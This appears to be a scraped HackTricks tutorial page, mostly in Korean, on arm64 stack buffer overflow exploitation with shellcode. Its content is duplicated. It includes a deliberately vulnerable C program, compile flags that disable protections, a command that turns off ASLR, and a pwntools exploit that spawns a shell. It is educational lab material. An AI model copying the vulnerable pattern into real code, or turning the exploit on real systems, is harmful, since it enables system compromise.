Stack Shellcode - arm64

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE) GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks 지원하기

구독 계획 확인하기!
**💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 팁을 공유하세요.

arm64에 대한 소개는 다음에서 확인하세요:

Introduction to ARM64v8

Code

#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
vulnerable_function();
return 0;
}

Compile without pie, canary and nx:

clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack

ASLR 비활성화 및 카나리 없음 - 스택 오버플로우

ASLR을 중지하려면:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

bof의 오프셋을 확인하려면 이 링크를 참조하세요.

Exploit:

from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Start the process
p = process(binary_name)

# Offset to return address
offset = 72

# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode

print("Payload length: "+ str(len(payload)))

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()

여기서 "복잡한" 유일한 것은 호출할 스택의 주소를 찾는 것입니다. 제 경우에는 gdb를 사용하여 찾은 주소로 익스플로잇을 생성했지만, 익스플로잇할 때는 작동하지 않았습니다(스택 주소가 약간 변경되었기 때문입니다).

생성된 core 파일을 열고(gdb ./bog ./core) 셸코드 시작의 실제 주소를 확인했습니다.

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousStack Shellcode NextStack Pivoting - EBP2Ret - EBP chaining

Last updated 6 days ago

Code

#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
vulnerable_function();
return 0;
}

Compile without pie, canary and nx:

clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack

ASLR 비활성화 및 카나리 없음 - 스택 오버플로우

ASLR을 중지하려면:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Exploit:

from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Start the process
p = process(binary_name)

# Offset to return address
offset = 72

# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode

print("Payload length: "+ str(len(payload)))

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()

생성된 core 파일을 열고(gdb ./bog ./core) 셸코드 시작의 실제 주소를 확인했습니다.